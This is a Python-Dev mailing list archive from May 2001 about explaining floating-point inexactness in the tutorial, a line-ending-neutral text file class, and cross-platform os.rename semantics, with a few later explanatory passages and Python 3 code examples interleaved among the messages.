> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy at digicool.com  Wed May 23 00:57:40 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
	<m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh at python.net> writes:

  MWH> Michel Pelletier <michel at digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker at home.net  Wed May 23 01:21:01 2001
From: chrishbarker at home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line   
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

Just van Rossum wrote:

> Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't
> seem to help focussing on actual content...
> 
> Just

Just (or anyone else)

Have you made any progress on this PEP? I'd like to see it happen, so if
you haven't done it, I'll try to find the time to make a start on it
you havn't done it, I'll try to find the time to make a start on it
myself.

I have written a simple class that implements a line-ending-neutral text
file class. I wrote it because I have a need for it, and I thought it
would be a reasonable prototype for any syntax and methods we might want
to use in an actual implementation. I doubt anyone would find the
methods I used particularly clean or elegant (or fast) but it's the
first thing I've come up with, and it seems to work.

I've enclosed the module with this email. If that doesn't work, let me
know and I'll put it on a website.
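For comparison, this is roughly the behaviour that was later standardized as "universal newlines" (PEP 278). In Python 3 it is controlled by the io module's `newline` parameter. The sketch below uses in-memory streams so it needs no files. It shows the modern built-in mechanism, not Chris's UniversalTextFile:

```python
import io

raw = b"unix line\nmac line\rdos line\r\n"

# newline=None turns "\n", "\r" and "\r\n" into "\n" when reading.
reader = io.TextIOWrapper(io.BytesIO(raw), encoding="ascii", newline=None)
lines = reader.readlines()
print(lines)            # ['unix line\n', 'mac line\n', 'dos line\n']

# newline="\r\n" turns every "\n" written into "\r\n" (like LineEndingType="DOS").
buf = io.BytesIO()
writer = io.TextIOWrapper(buf, encoding="ascii", newline="\r\n")
writer.write("one\ntwo\n")
writer.flush()
print(buf.getvalue())   # b'one\r\ntwo\r\n'
```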

-Chris

-- 
Christopher Barker,
Ph.D.                                                           
ChrisHBarker at home.net                 ---           ---           ---
http://members.home.net/barkerlohmann ---@@       -----@@       -----@@
                                   ------@@@     ------@@@     ------@@@
Oil Spill Modeling                ------   @    ------   @   ------   @
Water Resources Engineering       -------      ---------     --------    
Coastal and Fluvial Hydrodynamics --------------------------------------
------------------------------------------------------------------------
-------------- next part --------------
#!/usr/bin/env python

"""

TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added flags and arguments)

or

import TextFile

file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])


"""
import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "r",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and two new parameters have been added.

    Call:

    file = open(filename, flags = "r", bufsize = -1, LineEndingType = "", LineBufferSize = "")
    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard open
      command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there are both "w" and "t" then the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file

    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function

    - LineEndingType is used only for writing (and appending) files, to specify a
      non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.

    - LineBufferSize is the size of the buffer used to read data in
    a readline() operation. The default is currently set to 100
    characters. Longer lines are still read correctly, but each one
    takes extra reads; if you will be reading files with many lines
    over 100 characters long, set this to the largest expected line
    length.

    
    """

    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)
    
    
class UniversalTextFile:
    """
    
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrary formatted text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.

    """
    def __init__(self,filename,flags = "r",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        if LineEndingType in ("", "native"): # open() passes "" by default
            self.LineSep = os.linesep # a string, not a function
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType
        
        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 100

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file position is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos  = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                if return_pos == len(Buffer)-1:
                    # a "\r" at the very end of the buffer may be the first
                    # half of a "\r\n" split across two reads, so fetch one
                    # more byte and check again
                    NextByte = self._file.read(1)
                    if NextByte:
                        Buffer = Buffer + NextByte
                        continue
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """

        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a maximum of that many
        bytes. It will not round up, as the regular readlines does. This
        means that if sizehint is less than the length of the next
        line, you won't get anything.

        """
        
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """

        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very useful, and it allows me to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, If I ever get around to writing this in C, it will provide a speed improvement.

        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
     
        read acts like the regular read, except that it translates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"
        
        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could be patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
      
        """
        
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()
            
        return Data.replace("\r\n","\n").replace("\r","\n")
    
    def write(self,string):
        """

        write is just like the regular one, except that it uses the line
          separator specified when the file was opened for writing or
          appending.


        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)
        

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()
    

From guido at digicool.com  Wed May 23 01:46:53 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:46:53 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT."
             <15114.57378.887742.531145@beluga.mojam.com> 
References: <15114.57378.887742.531145@beluga.mojam.com> 
Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com>

> It was brought to my attention a week ago by a client that os.rename
> semantics differ between Unix and Windows.  On Unix, if the destination file
> already exists it is silently deleted.  On Windows, an exception is raised.
> I was able to verify this for Python 2.0 on Windows98.  I assume nothing
> changed for 2.1, but I can't verify that.

I've always known this, and assumed it was common knowledge.
Sorry. ;-)

> (Windows trashed my partition
> table and my Linux root partition while I was downloading 2.1.
> Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
> checked the Mac yet (will do that when I get back to the US), but I think
> that os.rename should have the same semantics across all platforms.  To the
> extent reasonably possible, I think this should also be true of other common
> functions exposed through the os module.
> 
> On the (unsupportable) theory that to-date, more Python apps have been
> written and/or deployed on Unix-like systems and that where Windows apps are
> concerned, many developers will have added a thin wrapper to mimic the Unix
> semantics, I think less breakage would result if the Unix semantics were
> implemented in the Windows version.  It appears that is what POSIX
> compliance would demand as well.
> 
> Skip

I certainly wouldn't want to try to emulate the Windows semantics on
Unix.  However, I think that emulating the correct Posix semantics on
Windows is not possible either.  The Posix rename() call guarantees
that it is atomic: there is no point in time where the file doesn't
exist at all (and a system or program crash can't delete the file).  I
wouldn't know how to do that in Windows -- the straightforward version

    if os.path.exists(target):
        os.unlink(target)
    os.rename(source, target)

leaves a vulnerability open where the target doesn't exist and if at
that point the system crashes or the program is killed, you lose the
target.

I would prefer to document the difference so applications can decide
how to deal with this.
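Much later Python versions (3.3 and up) added os.replace(), which overwrites an existing target on every platform and maps to a single rename() on POSIX. A common pattern built on it is sketched below with a hypothetical atomic_write() helper: write the new data to a temporary file in the same directory, then replace the target. On POSIX the target is therefore never missing; the sketch makes no atomicity claim for Windows. It illustrates the atomicity Guido describes and was not proposed in this thread.

```python
import os
import tempfile


def atomic_write(path, data):
    """Replace the contents of `path` with `data` (bytes).

    Sketch only: the data goes to a temporary file in the same directory,
    then os.replace() moves it over `path`.  On POSIX that is one rename(),
    so readers see either the old file or the new one, never neither.
    """
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "wb") as tmp:
            tmp.write(data)
            tmp.flush()
            os.fsync(tmp.fileno())  # get the bytes to disk before renaming
        os.replace(tmp_path, path)  # overwrites an existing target
    except BaseException:
        os.unlink(tmp_path)         # don't leave the temporary file behind
        raise
```

Because the temporary file sits in the same directory as the target, both names are on the same filesystem, which a rename requires.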

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 01:50:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 19:50:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT."
             <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain> 
Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com>

> Who was it that said every equation will halve your audience?

Einstein.

> I agree with that, the tutorial should try to be as broad and simple
> as possible.

But keep in mind that the particular Python tutorial we're talking
about is intended for an audience of folks who already know how to
program.  I vote against dumbing this down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Wed May 23 02:17:59 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 17:17:59 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com>
Message-ID: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain>

On Tue, 22 May 2001, Guido van Rossum wrote:

> > I agree with that, the tutorial should try to be as broad and simple
> > as possible.
> 
> But keep in mind that the particular Python tutorial we're talking
> about is intended for an audience of folks who already know how to
> program.  I vote against dumbing this down.

Now that I've actually read the tutorial (wink) I see the true target
audience.  For some reason, I thought it was oriented more toward the CP4E
audience.

Is there a python "children's book" complete with big red dogs and rabbits
in waistcoats?  That would be an interesting project...

-Michel


From guido at digicool.com  Wed May 23 02:20:25 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 20:20:25 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT."
             <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
References: <Pine.LNX.4.21.0105221712250.22109-100000@localhost.localdomain> 
Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com>

> Is there a python "children's book" complete with big red dogs and rabbits
> in waistcoats?  That would be an interesting project...

See http://www.python.org/sigs/edu-sig/ and
http://www.python.org/doc/Intros.html (the latter has a section with
intros for non-programmers).

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Wed May 23 02:23:42 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 20:23:42 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEOCKDAA.tim.one@home.com>

I struggled with a way to do a better job of explaining this stuff last
night.  As I see others already said, the Tutorial is not aimed at script
kiddies, or non-programmers, or even programming newbies, but at programmers
who are simply new to Python.  So everything I put in the tutorial was either
jarringly out of place, or inadequate to address the audience you (Michel)
have in mind.  But I agree that's an important audience, and I spend a fair
chunk of my life now anyway explaining this stuff over & over to those who
think computing a ratio of two integers is akin to solving fourth order
differential equations <wink>.

In the end I decided to write a Tutorial Appendix in a much gentler style.
It doesn't really fit with the rest of the Tutorial, but then that's *why*
it's an Appendix.  The patch is here:

    http://sourceforge.net/tracker/index.php?func=detail&aid=426208&group_id=5470&atid=305470

I also changed the tutorial fp examples so they have an excellent chance of
displaying the same strings across all platforms, and even if Python 10K
defaults to decimal floating-point someday (perhaps in the year 10000, as its
name suggests).


From gward at python.net  Wed May 23 02:33:11 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 20:33:11 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400
References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <20010522203311.E1245@gerg.ca>

On 22 May 2001, Guido van Rossum said:
> I would prefer to document the difference so applications can decide
> how to deal with this.

I agree -- it has always seemed to me that the standard library merely
exposes the underlying OS functionality for you.  This puts portability
somewhat in the hands of the application writer -- with power comes
responsibility.  I think that's the way it should be; any attempt to
convert OS A to the semantics of OS B will fall down somewhere.  Witness
the loss-of-atomicity in Guido's example.  I'm sure any other semantic
difference between OSes would have similar "gotchas" if we attempted to
paper over them.

        Greg
-- 
Greg Ward - just another Python hacker                  gward at python.net
http://starship.python.net/~gward/
Beware of altruism.  It is based on self-deception, the root of all evil.


From tim.one at home.com  Wed May 23 08:31:29 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:31:29 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <20010522094157.A1245@gerg.ca>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>

[Greg Ward, on http://www.lahey.com/float.htm]

> I found this article more useful, interesting, and informative than
> whatever I learned about binary floating-point in my academic years.
> Good link, Tim.  Two catches:
>
>   * I can just barely follow the FORTRAN examples; I very much doubt
>     the average Python newbie would have any more luck than me

The goal is to frighten them:  the ones with the right stuff to use fp
without destroying a satellite, bringing down the Internet, designing a
pacemaker that fails when rounding a corner clockwise at 1.37g, causing a
small country's economy to collapse, making jet fighters spontaneously turn
upside down when crossing the equator, or triggering WW III by accident, will
persist <wink>.  BTW, not all of those were made up!

>   * I tried several of the FORTRAN examples in Python, and did not
>     witness any of the gotchas they are meant to illustrate.  Possibly
>     it's just single-precision vs. double-precision difference, but
>     Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
>     doesn't demonstrate the same gotchas as that article does.

You can't illustrate the last half of their examples in Python without
playing obscure games with the struct module, because they rely on the
existence of more than one size of floating-point type.

Your lack of luck with the first half of their examples is indeed due solely
to the fact that he used single-precision examples, while Python's float is
double precision.  You need to find different numbers to show the same things
in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops!  It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops!  They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100. # "looks like" 3205. if display rounded
i = int(y)   # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that.  What I'm hearing is that
people won't understand it anyway -- so screw it.  If they want an education,
they can prove it by doing a google search <0.6 wink>.
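For readers on present-day Python, the last two of Tim's examples can be rewritten with print() as a function. This is a sketch; the first example is left out here because its outcome depends on exactly how the two literals round. The math.isclose() comparison at the end (Python 3.5+) is one common remedy for testing floats for equality and is not something discussed in this thread.

```python
import math

# Inexactness: 98/49 is exactly 2.0, but 98 * (1/49) inherits the
# rounding error made when 1/49 was stored as a binary double.
a = 98.0 / 49.0
b = 98.0 * (1.0 / 49.0)
print(a == b, repr(a), repr(b))

# Crazy Conversions: 32.05 is stored slightly low, so the product lands
# just under 3205 and int() truncates toward zero; round() does not.
y = 32.05 * 100.0
print(repr(y), int(y), round(y))

# Comparing with a relative tolerance instead of == treats a and b as equal.
print(math.isclose(a, b))
```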


From tim.one at home.com  Wed May 23 08:44:14 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 23 May 2001 02:44:14 -0400
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>

[Guido]
> ...
> I certainly wouldn't want to try to emulate the Windows semantics on
> Unix.  However, I think that emulating the correct Posix semantics on
> Windows is not possible either.

Neither is it desirable:  Windows isn't POSIX, and Windows users would be
appalled if os.rename() could silently destroy files.  If such a function
needs to exist, create a new cowboy_unix_tricks module instead <wink>.

This has never been a problem for me because I always check to see whether
the target file exists before using os.rename(), and do something else if it
does.  I understand that's vulnerable to races, but nobody asked whether I
cared about that <wink>.
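The check-then-rename race Tim mentions can be avoided on filesystems with hard links. The sketch below uses a hypothetical rename_no_clobber() helper in Python 3. os.link() creates the new name and fails with FileExistsError if it already exists, so the existence check and the creation of the target happen in one system call. A crash between the two calls leaves the file under both names, never under neither. The sketch assumes a regular file, src and dst on the same filesystem, and hard-link support; it is an illustration, not something proposed in the thread.

```python
import os


def rename_no_clobber(src, dst):
    """Rename src to dst, failing instead of overwriting an existing dst.

    Sketch only: relies on os.link() refusing to replace an existing name.
    """
    os.link(src, dst)   # raises FileExistsError if dst is already there
    os.unlink(src)      # drop the old name; the data now lives under dst
```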

> The Posix rename() call guarantees that it is atomic: there is no
> point in time where the file doesn't exist at all (and a system or
> program crash can't delete the file).  I wouldn't know how to do
> that in Windows -- the straightforward version
>
>     if os.path.exists(target):
>         os.unlink(target)
>     os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at
> that point the system crashes or the program is killed, you lose the
> target.

More obviously, it also fails if the target simply exists and is open (you
can't unlink an open file on Windows).

Nevertheless, you can do this renaming safely on Windows by doing the right
system magic to make the rename happen at reboot time, before Windows actually
starts.  But I'm not sure Skip's client would want to reboot each time Python
did a file rename <wink>.

> I would prefer to document the difference so applications can decide
> how to deal with this.

Yup!


From MarkH at ActiveState.com  Wed May 23 10:55:17 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Wed, 23 May 2001 18:55:17 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com>

[Tim on a subject near and dear to his testicles]

> It's Real Work coming up with stuff like that.  What I'm hearing is that
> people won't understand it anyway -- so screw it.  If they want an education,
> they can prove it by doing a google search <0.6 wink>.

I am inclined to agree.

IMO, the Python tutorial or other documentation should include a basic
example of these "errors", and a link to _either_ of the HTML pages
referenced in this thread as an optional extra.

Just enough to stop _most_ of the "this is a bug" posts - but stopping well
short of any attempt to "educate" them in floating point madness.  Just
_one_ example of floats not being exact would suffice.

Going from my personal experience, I learnt long ago that floating point is
not exact.  That is all I needed to know to move on.  I didn't like it, and
I didn't understand exactly why (I thought I did, but Tim put a stop to that
misconception <wink>), but I could move on once I had that skerrick of
enlightenment.  And believe it or not, some of my code _does_ use floats,
and _does_ work! (well, works as well as the rest of my code anyway <wink>)

And-it-wasn't-even-Python-that-taught-me,

Mark.


From pf at artcom-gmbh.de  Wed May 23 09:49:13 2001
From: pf at artcom-gmbh.de (Peter Funk)
Date: Wed, 23 May 2001 09:49:13 +0200 (MEST)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred
 L. Drake, Jr." at "May 22, 2001 06:04:11 pm"
Message-ID: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>

Hi,

Fred L. Drake, Jr. schrieb:
> skip at pobox.com writes:
>  > On the (unsupportable) theory that to-date, more Python apps have been
>  > written and/or deployed on Unix-like systems and that where Windows apps are
>  > concerned, many developers will have added a thin wrapper to mimic the Unix
>  > semantics, I think less breakage would result if the Unix semantics were
> 
>   I don't know whether there are more deployed Python apps on Unix
> than on Windows (and I've no good idea about how to find out), but I
> think unifying the semantics one way or the other is a good thing.
> Regardless of which set of semantics is chosen.

I agree.  May I suggest adding an optional third boolean parameter to
os.rename called 'replace', defaulting to either TRUE or FALSE, so that
modifying existing apps becomes even less of a hassle for potential porters.
Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here.  recursive removal?  dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------

Regards, Peter
-- 
Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260
office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany)


From jack at oratrix.nl  Wed May 23 13:15:10 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Wed, 23 May 2001 13:15:10 +0200
Subject: [Python-Dev] Assertion failed in dictobject.c
Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl>

I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The 
debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and 
interestingly hash is also 8.

Going back to revision 2.90 fixes the problem (or masks it).
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From skip at pobox.com  Wed May 23 13:59:45 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 06:59:45 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
References: <200105222346.f4MNkr104833@odiug.digicool.com>
	<LNBBLJKPBEHFEDALKOLCCEOOKDAA.tim.one@home.com>
Message-ID: <15115.42545.172775.716565@beluga.mojam.com>

>>>>> "Tim" == Tim Peters <tim.one at home.com> writes:

    Tim> [Guido]
    >> I would prefer to document the difference so applications can decide
    >> how to deal with this.

    Tim> Yup!

Submitted as patch #426598, assigned to Dr. Doc (aka Fred).

Skip


From skip at pobox.com  Wed May 23 14:11:51 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 23 May 2001 07:11:51 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <m152TOL-000CpwC@artcom0.artcom-gmbh.de>
References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>
	<m152TOL-000CpwC@artcom0.artcom-gmbh.de>
Message-ID: <15115.43271.480135.227059@beluga.mojam.com>

    Peter> I agree.  May I suggest adding an optional third boolean
    Peter> parameter to os.rename called 'replace', defaulting to either
    Peter> TRUE or FALSE, so that modifying existing apps becomes even less
    Peter> of a hassle for potential porters.

In his response to my post, Guido indicated there is a race condition.
Between the time you delete the preexisting destination file and do the
actual file rename, Windows could wink out on you, leaving you with the
original src file and no original dst file.  POSIX semantics require the
rename to be atomic.  This is just not going to be possible.

Fred, perhaps my doc mod should be enhanced to identify the race condition
for people who need to use os.rename on Windows and will be forced to first
unlink the destination file.
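For code that must run where rename() refuses to overwrite, a less destructive variant of "unlink the destination, then rename" is to move the old destination aside first. It is sketched below with a hypothetical replace_via_backup() helper in Python 3. It is still not atomic: a crash between the two renames leaves no file named dst. The old contents do survive under the backup name, though, instead of being lost. The sketch assumes no stale backup file already exists.

```python
import os


def replace_via_backup(src, dst, backup_suffix=".bak"):
    """Rename src to dst even if dst exists, keeping the old dst until done.

    Sketch only, NOT atomic: between the two renames no file is named dst,
    but the old contents are still available as dst + backup_suffix.
    """
    backup = dst + backup_suffix
    have_backup = os.path.exists(dst)
    if have_backup:
        os.rename(dst, backup)        # old target survives under the backup name
    try:
        os.rename(src, dst)
    except OSError:
        if have_backup:
            os.rename(backup, dst)    # put the old target back
        raise
    if have_backup:
        os.remove(backup)             # only now are the old contents discarded
```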

Skip


From guido at digicool.com  Wed May 23 15:19:24 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:19:24 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT."
             <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCGEONKDAA.tim.one@home.com> 
Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com>

I liked the text that Tim posted to SF, but I would like it even
better if it also *contained* the text from the "PresentationError"
moinmoin wiki page, rather than referring to it by URL.  The moinmoin
URL is not a good long-term name for that information -- printed
copies of the tutorial will persist long after the moinmoin wiki has
been moved or consolidated.  Plus, instead of referring people to the
moinmoin wiki page, I'd like to be able to refer them to the appendix
of the tutorial!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Wed May 23 15:32:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 23 May 2001 09:32:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000."
             <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPIELMDNAA.MarkH@ActiveState.com> 
Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com>

[Mark]
> IMO, The Python tutorial or other documentation should include a basic
> example of these "errors", and a link to _either_ of the HTML pages
> referenced in this thread as an optional extra.
> 
> Just enough to stop _most_ of the "this is a bug" posts - but
> stopping well short of any attempt to "educate" them in floating
> point madness.  Just _one_ example of floats not being exact would
> suffice.

I agree: we don't have to explain *why* it happens.  We just have to
explain *that* it happens, so folks don't think they've discovered
a bug in Python.

Or maybe we could do this: in the main text, explain and show *that*
it happens, and refer to the appendix which can explain *why* it
happens to those interested, in a gentle manner like what Tim already
wrote.
